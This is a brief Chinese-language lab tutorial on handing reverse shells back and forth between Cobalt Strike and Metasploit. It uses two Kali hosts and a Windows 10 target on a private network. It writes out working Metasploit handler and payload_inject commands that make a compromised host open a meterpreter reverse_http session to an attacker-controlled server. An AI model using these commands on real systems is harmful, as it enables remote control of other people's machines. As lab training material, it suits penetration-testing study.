Cs的shell反弹到msf
首先咋们需要准备两台kali,一台win10靶机
kali1 ip:192.168.5.129
kali2 ip:192.168.5.161
win10 ip:192.168.5.165
咋们利用kali1打开cs,利用kali2打开msf进行联动;
在cs上建立一个监听,名字随便起,这里我起名为test,ip输入kali1的;
生成一段payload,并在win10靶机上线(在win10点击生成的payload即可)
然后在kali2启动msf,使用监听模块
命令:
msfconsole //进入msf控制台
use exploit/multi/handler //进入监听模块
set payload windows/meterpreter/reverse_http //设置http协议
set lhost 192.168.5.161 //kali2的ip
set lport 2222
run
在添加一个监听器和msf一样就行了
这时候需要把码主动的发给msf,所以选择foreign http
对了,要右键把回连间隔设置成0,不然太慢了
接下来我们把我们的这个shell发送给msf,
命令:执行choose
或者直接spawn msf
成功获取权限
msf传shell给cs
首先,msf获得win10的权限,具体操作:msfconsole之制作windows木马并成功获取shell(反向payload)-CSDN博客
先在 cs 开启监听,Cobalt Strike->Listeners-Add,Name 随便填,Host 填写服务端 ip,Port 填写服务端设置的端口
首先msf中已有会话session 1
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http #两边的payload协议一定要对应的
set DisablePayloadHandler true #默认情况下,payload_inject执行之后会在本地产生一个新的handler,由于已经有了一个不需要再产生一个,所以这里设置为true
set lhost 192.168.5.129 #cobaltstrike服务端ip
set lport 4444 #cobaltstrike服务端监听的端口
set session 1 #这里是当前获得的session的id
run
可以看到 cs 成功接收到 shell